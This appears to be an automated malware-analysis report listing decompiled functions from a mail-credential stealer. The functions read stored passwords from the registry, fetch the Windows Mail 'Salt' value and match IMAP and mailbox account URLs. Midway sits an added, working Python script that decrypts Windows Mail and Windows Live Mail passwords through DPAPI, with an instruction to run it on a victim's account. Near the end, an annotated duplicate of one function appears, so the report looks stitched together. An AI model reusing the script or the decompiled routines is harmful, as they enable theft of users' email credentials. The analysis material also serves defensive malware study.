	void* _t76;
	void* _t77;
	void* _t78;
	void* _t79;

	_v1028 = 0;
	memset( &_v1027, 0, 0xfe);
	_v772 = 0;
	memset( &_v771, 0, 0xfe);
	_v516 = 0;
	memset( &_v515, 0, 0xfe);
	_t77 = _t76 + 0x24;
	if(_a16 != 0xffffffff) {
		sprintf( &_v1028, " bgcolor=\"%s\"", E0040F6E2(_a16,  &_v1284));
		_t77 = _t77 + 0x14;
	}
	if(_a20 != 0xffffffff) {
		sprintf( &_v772, "<font color=\"%s\">", E0040F6E2(_a20,  &_v1284));
		strcpy( &_v516, "</font>");
		_t77 = _t77 + 0x1c;
	}
	sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
	E00405F07(_a4,  &_v2308);
	_t47 = _a12;
	_t78 = _t77 + 0x14;
	if(_t47 > 0) {
		_t73 = _a8 + 4;
		_a16 = _t47;	// reused as the remaining-column counter
		do {
			_v260 = 0;
			memset( &_v259, 0, 0xfe);
			_t50 =  *_t73;
			_t79 = _t78 + 0xc;
			if( *_t50 == 0) {
				_v260 = 0;	// empty width string: no width attribute
			} else {
				sprintf( &_v260, " width=\"%s\"", _t50);
				_t79 = _t79 + 0xc;
			}
			sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
			_t57 = E00405F07(_a4,  &_v2308);
			_t78 = _t79 + 0x20;
			_t73 = _t73 + 8;
			_t34 =  &_a16;
			 *_t34 = _a16 - 1;
                                                                                                                                                                  					} while ( *_t34 != 0);
                                                                                                                                                                  					return _t57;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t47;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: sprintf$memset$strcpy
                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                  • API String ID: 898937289-3842416460
                                                                                                                                                                  • Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                  • Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040DD59(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				short* _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				char* _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				int _v44;
                                                                                                                                                                  				void _v299;
                                                                                                                                                                  				char _v300;
                                                                                                                                                                  				char _v556;
                                                                                                                                                                  				char _v812;
                                                                                                                                                                  				char _v4908;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				long _t46;
                                                                                                                                                                  				int* _t84;
                                                                                                                                                                  				char* _t85;
                                                                                                                                                                  
                                                                                                                                                                  				E00412360(0x132c, __ecx);
                                                                                                                                                                  				_t1 =  &_a16; // 0x40e170
                                                                                                                                                                  				_t84 = 0;
                                                                                                                                                                  				_t2 =  &_a16; // 0x40e170
                                                                                                                                                                  				_t46 = RegOpenKeyExA( *_t2, "Creds", 0, 0x20019, _t1);
                                                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                                                  					return _t46;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v300 = _t46;
                                                                                                                                                                  				memset( &_v299, 0, 0xff);
                                                                                                                                                                  				_push(0xff);
                                                                                                                                                                  				_push( &_v300);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                                                                                                                                  					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                                                                                                                                  						_v12 = 0x1000;
                                                                                                                                                                  						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                                                                                                                                  							_v32 = _v12;
                                                                                                                                                                  							_v28 =  &_v4908;
                                                                                                                                                                  							_v40 = _a12;
                                                                                                                                                                  							_v36 = _a8;
                                                                                                                                                                  							if(E0040481B(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                                                                                                                                  								_t85 =  &_v812;
                                                                                                                                                                  								_v812 = 0;
                                                                                                                                                                  								_v556 = 0;
                                                                                                                                                                  								E004060DA(0xff, _t85,  &_v300);
                                                                                                                                                                  								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                                                                                                                                  								 *((intOrPtr*)( *_a4))(_t85);
                                                                                                                                                                  								LocalFree(_v20);
                                                                                                                                                                  								_t84 = 0;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						RegCloseKey(_v16);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v8 = _v8 + 1;
                                                                                                                                                                  					_push(0xff);
                                                                                                                                                                  					_push( &_v300);
                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return RegCloseKey(_a16);
                                                                                                                                                                  			}

APIs
• RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
• memset.MSVCRT ref: 0040DDA1
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
• LocalFree.KERNEL32(00000001), ref: 0040DE83
• RegCloseKey.ADVAPI32(?), ref: 0040DE8E
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
• RegCloseKey.ADVAPI32(?), ref: 0040DEB6
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
• API String ID: 551151806-2386532916
• Opcode ID: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
• Instruction ID: 9b96f835ed6997495325440ed53231f0f0ace883948e60a6f3a7b66043991938
• Opcode Fuzzy Hash: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
• Instruction Fuzzy Hash: 61410676900219AFDB11DFA5DC84EEFBBBCEB48755F0040A6F905E2150DA34AB948B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040E74B() {
	void* _t1;
	int _t2;
	struct HINSTANCE__* _t4;

	if( *0x418518 != 0) {
		return _t1;
	}
	_t2 = LoadLibraryA("psapi.dll");
	_t4 = _t2;
	if(_t4 == 0) {
		L10:
		return _t2;
	} else {
		_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
		 *0x417fec = _t2;
		if(_t2 != 0) {
			_t2 = GetProcAddress(_t4, "EnumProcessModules");
			 *0x417fe4 = _t2;
			if(_t2 != 0) {
				_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
				 *0x417fdc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "EnumProcesses");
					 *0x41810c = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "GetModuleInformation");
						 *0x417fe8 = _t2;
						if(_t2 != 0) {
							 *0x418518 = 1;
						}
					}
				}
			}
		}
		if( *0x418518 == 0) {
			_t2 = FreeLibrary(_t4);
		}
		goto L10;
	}
}

Addresses: 0x0040e752 0x0040e7e2 0x0040e7e2 0x0040e75e 0x0040e764 0x0040e768 0x0040e7e1 0x00000000 0x0040e76a 0x0040e777 0x0040e77b 0x0040e780 0x0040e788 0x0040e78c 0x0040e791 0x0040e799 0x0040e79d 0x0040e7a2 0x0040e7aa 0x0040e7ae 0x0040e7b3 0x0040e7bb 0x0040e7bf 0x0040e7c4 0x0040e7c6 0x0040e7c6 0x0040e7c4 0x0040e7b3 0x0040e7a2 0x0040e791 0x0040e7d8 0x0040e7db 0x0040e7db 0x00000000 0x0040e7d8

APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
• FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
• API String ID: 2449869053-232097475
• Opcode ID: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
• Instruction ID: 4da247ea616dd2a72ab7006308dc9c89d3535959c96c16615461c58e29f3e28a
• Opcode Fuzzy Hash: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
• Instruction Fuzzy Hash: B8012530645211AAC711DB266C81FA73DF99B85B80F15843FF400F2694DB7CC5529A6C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E00410BCE(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	char _v6;
	char _v7;
	char _v8;
	int _v12;
	intOrPtr _v16;
	void* _v20;
	short* _v24;
	unsigned int _v28;
	char* _v32;
	int _v36;
	intOrPtr _v40;
	signed int _v44;
	void _v299;
	char _v300;
	void _v555;
	char _v556;
	char _v1080;
	void* __esi;
	int _t56;
	intOrPtr _t58;
	intOrPtr _t64;
	char _t92;
	char* _t93;
	void* _t100;
	signed int _t102;
	signed int _t107;
	intOrPtr _t108;
	void* _t113;

	_t113 = __eflags;
	_t100 = __edx;
	_t93 = __eax;
	E004046E1( &_v1080);
	if(E004047AA( &_v1080, _t113) != 0) {
		_t56 = strlen(_t93);
		asm("cdq");
		_t107 = _t56 - _t100 >> 1;
		_t2 = _t107 + 1; // 0x1
		_t58 = _t2;
		L00412090();
		_t102 = 0;
		_t96 = _t58;
		_v16 = _t58;
		if(_t107 > 0) {
			do {
                                                                                                                                                                  							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                                                                                                                                  							_v7 = _t93[1 + _t102 * 2];
                                                                                                                                                                  							_v6 = 0;
                                                                                                                                                                  							_t92 = E00406541( &_v8);
                                                                                                                                                                  							_t96 = _v16;
                                                                                                                                                                  							 *((char*)(_t102 + _v16)) = _t92;
                                                                                                                                                                  							_t102 = _t102 + 1;
                                                                                                                                                                  						} while (_t102 < _t107);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v556 = 0;
                                                                                                                                                                  					memset( &_v555, 0, 0xff);
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_v300 = 0;
                                                                                                                                                                  					memset( &_v299, 0, 0xfe);
                                                                                                                                                                  					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                                                                                                                                  					if(_t64 != 1) {
                                                                                                                                                                  						__eflags = _t64 - 2;
                                                                                                                                                                  						if(_t64 == 2) {
                                                                                                                                                                  							_push("Software\\Microsoft\\Windows Live Mail");
                                                                                                                                                                  							goto L7;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Software\\Microsoft\\Windows Mail");
                                                                                                                                                                  						L7:
                                                                                                                                                                  						strcpy( &_v300, ??);
                                                                                                                                                                  						_pop(_t96);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(E0040F1B0(0x80000001,  &_v300,  &_v20) == 0) {
                                                                                                                                                                  						_v12 = 0xff;
                                                                                                                                                                  						E0040F214(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                                                                                                                                  						RegCloseKey(_v20);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v40 = _v16;
                                                                                                                                                                  					_v36 = _v12;
                                                                                                                                                                  					_v32 =  &_v556;
                                                                                                                                                                  					_v44 = _t107;
                                                                                                                                                                  					if(E0040481B( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                                                                                                                                  						_t108 = _a8;
                                                                                                                                                                  						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                                                                                                                                  						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                                                                                                                                  						LocalFree(_v24);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(_v16);
                                                                                                                                                                  					L00412096();
                                                                                                                                                                  				}
                                                                                                                                                                  				return E004047FB( &_v1080);
                                                                                                                                                                  			}
                                                                                                                                                                   Instruction addresses of the listing above (per-line address column): 0x00410bce - 0x00410d64

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • strlen.MSVCRT ref: 00410BF5
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410C05
                                                                                                                                                                  • memset.MSVCRT ref: 00410C51
                                                                                                                                                                  • memset.MSVCRT ref: 00410C6E
                                                                                                                                                                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410CE0
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00410D46
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                                                                                                                                                                    • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00410C84
                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                                                                                                                                                                  • Salt, xrefs: 00410CCA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                  • API String ID: 1673043434-2687544566
                                                                                                                                                                  • Opcode ID: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                  • Instruction ID: 35ff079a9a2d20c7a5c67e942e04d515760747927ccc6212efb4229f933df569
                                                                                                                                                                  • Opcode Fuzzy Hash: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 94419876D0021DAECB11DBA5DC41ADEBBBCAF48304F0441ABEA45F3241DA74DB85CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
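Added example (not code from the sample or from this report): a Python re-implementation of the routine decompiled above, to make explicit what it recovers. It assumes, from the API list, that E00406541 is strtoul(…, 16) applied to each two-character chunk of the hex-encoded password, that E0040F1B0/E0040F214 open HKCU\<subkey> and read the raw bytes of the "Salt" value, and, from the LoadLibraryA/GetProcAddress resolver in E004047AA, the DATA_BLOB-shaped argument pairs (_v44/_v40, _v36/_v32, _v28/_v24) and the LocalFree of the result, that E0040481B wraps CryptUnprotectData with the salt as optional entropy. Whether the salt length includes a string terminator is not visible in the decompilation, so the example passes the registry value's bytes without one. The DPAPI call only succeeds on Windows in the same user context the data was protected in; the hex decoding, subkey selection and output truncation run anywhere.

```python
"""Re-implementation of the Windows Mail / Windows Live Mail password-recovery routine
decompiled above. Added example; not the sample's own code."""
import ctypes
import sys
from ctypes import POINTER, Structure, byref, c_char, c_int, c_uint32, c_void_p, c_wchar_p

# Subkey chosen by the account-type field at _a4+0x86c: 1 -> Windows Mail, 2 -> Windows Live Mail.
MAIL_SUBKEYS = {
    1: r"Software\Microsoft\Windows Mail",
    2: r"Software\Microsoft\Windows Live Mail",
}
SALT_VALUE = "Salt"
HEX_DIGITS = "0123456789abcdefABCDEF"


class DATA_BLOB(Structure):
    """crypt32 DATA_BLOB: the {cbData, pbData} pairs the decompilation builds on the stack."""
    _fields_ = [("cbData", c_uint32), ("pbData", POINTER(c_char))]


def mail_subkey(account_kind: int) -> str:
    """Any other kind leaves the subkey buffer empty, as the original's if/else does."""
    return MAIL_SUBKEYS.get(account_kind, "")


def hex_to_bytes(hex_text: str) -> bytes:
    """Mirror the decompiled loop: strlen/2 iterations, each two-character chunk through
    strtoul(..., 16). A trailing odd nibble is dropped; a chunk with no leading hex digit
    becomes 0, as strtoul returns 0 when nothing parses."""
    out = bytearray()
    for i in range(len(hex_text) // 2):
        chunk = hex_text[2 * i:2 * i + 2]
        digits = ""
        for ch in chunk:
            if ch not in HEX_DIGITS:
                break
            digits += ch
        out.append(int(digits, 16) if digits else 0)
    return bytes(out)


def read_mail_salt(account_kind: int) -> bytes:
    """Read HKCU\\<subkey>\\Salt; an absent key or value yields b'' (entropy length 0 in the
    original). Assumption: the value bytes are used as-is, capped at the original's 0xff-byte
    buffer; a REG_SZ is passed as its ANSI bytes without a terminator."""
    import winreg  # Windows only
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, mail_subkey(account_kind)) as key:
            value, _ = winreg.QueryValueEx(key, SALT_VALUE)
    except OSError:
        return b""
    if isinstance(value, str):
        return value.encode("mbcs")[:255]
    if isinstance(value, bytes):
        return value[:255]
    raise TypeError("unexpected registry value type for Salt")


def dpapi_unprotect(blob: bytes, entropy: bytes) -> bytes:
    """CryptUnprotectData(blob, entropy) in the calling user's context; raises on failure."""
    if sys.platform != "win32":
        raise OSError("CryptUnprotectData is only available on Windows")
    crypt32 = ctypes.WinDLL("crypt32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    crypt32.CryptUnprotectData.argtypes = [POINTER(DATA_BLOB), POINTER(c_wchar_p), POINTER(DATA_BLOB),
                                           c_void_p, c_void_p, c_uint32, POINTER(DATA_BLOB)]
    crypt32.CryptUnprotectData.restype = c_int
    kernel32.LocalFree.argtypes = [c_void_p]
    kernel32.LocalFree.restype = c_void_p

    in_buf = ctypes.create_string_buffer(blob, len(blob))
    data_in = DATA_BLOB(len(blob), ctypes.cast(in_buf, POINTER(c_char)))
    data_ent = None
    if entropy:  # empty salt: no optional entropy
        ent_buf = ctypes.create_string_buffer(entropy, len(entropy))
        data_ent = DATA_BLOB(len(entropy), ctypes.cast(ent_buf, POINTER(c_char)))
    data_out = DATA_BLOB()
    ok = crypt32.CryptUnprotectData(byref(data_in), None, byref(data_ent) if data_ent else None,
                                    None, None, 0, byref(data_out))
    if not ok:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        return ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        kernel32.LocalFree(ctypes.cast(data_out.pbData, c_void_p))  # the original LocalFree(_v24)


def recover_mail_password(hex_text: str, salt: bytes) -> str:
    """Decode, unprotect and convert as the original does: it passes cbData/2 UTF-16 code units
    through WideCharToMultiByte into a 255-byte field at _a8+0x400 and terminates the result."""
    plaintext = dpapi_unprotect(hex_to_bytes(hex_text), salt)
    units = len(plaintext) // 2
    return plaintext[:units * 2].decode("utf-16-le", errors="replace").rstrip("\x00")[:255]


if __name__ == "__main__":
    kind = int(sys.argv[1])  # 1 = Windows Mail, 2 = Windows Live Mail
    print(recover_mail_password(sys.argv[2], read_mail_salt(kind)))
```

Run as `python recover.py 2 <hex blob>` on the victim's own account to confirm what the sample exfiltrates; the blob is the hex string stored with the account, which is why the sample walks the string in two-character steps rather than treating it as raw bytes.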

                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040CD82(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				void _v619;
                                                                                                                                                                  				char _v620;
                                                                                                                                                                  				void _v1231;
                                                                                                                                                                  				char _v1232;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				char* _t54;
                                                                                                                                                                  				intOrPtr _t60;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				char* _t62;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				intOrPtr _t84;
                                                                                                                                                                  				void* _t85;
                                                                                                                                                                  				intOrPtr _t87;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t89;
                                                                                                                                                                  
                                                                                                                                                                  				_t87 = _a4;
                                                                                                                                                                  				_t84 = __ecx;
                                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                                  				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                                                                                                  					_t37 = 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(0xa);
                                                                                                                                                                  				_push("mailbox://");
                                                                                                                                                                  				_push(_t37);
                                                                                                                                                                  				L004120D2();
                                                                                                                                                                  				_t89 = _t88 + 0xc;
                                                                                                                                                                  				if(_t37 == 0) {
                                                                                                                                                                  					L8:
                                                                                                                                                                  					_a4 = 0;
                                                                                                                                                                  					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t85 = E0040DA96(_a4, _t84 + 0x468);
                                                                                                                                                                  							_v620 = 0;
                                                                                                                                                                  							memset( &_v619, 0, 0x261);
                                                                                                                                                                  							_v1232 = 0;
                                                                                                                                                                  							memset( &_v1231, 0, 0x261);
                                                                                                                                                                  							_t17 = _t85 + 0x104; // 0x104
                                                                                                                                                                  							_t18 = _t85 + 0x204; // 0x204
                                                                                                                                                                  							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                                                                                                  							_t20 = _t85 + 0x104; // 0x104
                                                                                                                                                                  							_t21 = _t85 + 0x204; // 0x204
                                                                                                                                                                  							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                                                                                                  							_t53 = 0;
                                                                                                                                                                  							_t89 = _t89 + 0x38;
                                                                                                                                                                  							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                                                                                                  								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                  							}
                                                                                                                                                                  							_push(_t53);
                                                                                                                                                                  							_t54 =  &_v620;
                                                                                                                                                                  							_push(_t54);
                                                                                                                                                                  							L00412072();
                                                                                                                                                                  							if(_t54 == 0) {
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t61 = 0;
                                                                                                                                                                  							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                                                                                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                  							}
                                                                                                                                                                  							_push(_t61);
                                                                                                                                                                  							_t62 =  &_v1232;
                                                                                                                                                                  							_push(_t62);
                                                                                                                                                                  							L00412072();
                                                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                                  								_t60 = _v8;
                                                                                                                                                                  								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                                                                                                                                  									_t84 = _t60;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								} else {
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  							L17:
                                                                                                                                                                  							if( *((char*)(E00406B3E( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                                                                                                                                  								E0040132A(_t57 + 1, _t85 + 0x304, 0xff);
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                                                                                                  						_t67 = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(7);
                                                                                                                                                                  					_push("imap://");
                                                                                                                                                                  					_push(_t67);
                                                                                                                                                                  					L004120D2();
                                                                                                                                                                  					_t89 = _t89 + 0xc;
                                                                                                                                                                  					if(_t67 == 0) {
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L21:
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}

(Per-line instruction address column of the decompiled function above, flattened by extraction; the listed addresses span 0x0040cd8d to 0x0040ceff in the dumped image, with 0x00000000 entries for label and goto lines.)

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _stricmp_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 4281260487-2229823034
• Opcode ID: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
• Instruction ID: 2d12b684a12309e3f166330e45fd276d2d431d1b057f0c9926c0b37ed6681b29
• Opcode Fuzzy Hash: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
• Instruction Fuzzy Hash: BE41B172604205DFD724DBA4C9C1F97B7E8AF08304F10467BE649E3281D778E955CB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
/* Decompiler output for the function at 0x0040CD80 in the unpacked image (memory dump
   00000018.00000002.423819557). The _tNN names are decompiler temporaries; _t17, _t18,
   _t20, _t21 and _t59 are emitted without declarations by the decompiler and are kept as-is.
   The routine formats "mailbox://%s@%s" and "imap://%s@%s" from two strings in each
   account record (offsets 0x104 and 0x204) and compares them against the input string,
   which is consistent with the mail-credential harvesting flagged elsewhere in this report. */
E0040CD80(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
	intOrPtr _v8;
	void _v619;
	char _v620;
	void _v1231;
	char _v1232;
	void* __edi;
	void* _t39;
	void* _t55;
	char* _t56;
	intOrPtr _t62;
	void* _t63;
	char* _t64;
	void* _t69;
	intOrPtr _t89;
	void* _t91;
	intOrPtr _t94;
	void* _t99;
	void* _t100;
	void* _t101;

	_t100 = _t99 - 0x4cc;
	_t94 = _a4;
	_t89 = __ecx;
	_v8 = __ecx;
	/* _t94 points at a string object: +0x1c is its length, +0xc/+0x10 locate its buffer */
	if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
		_t39 = 0;
	} else {
		_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
	}
	/* prefix check: does the input start with "mailbox://" (10 chars)? (_strnicmp, see API ID) */
	_push(0xa);
	_push("mailbox://");
	_push(_t39);
	L004120D2();
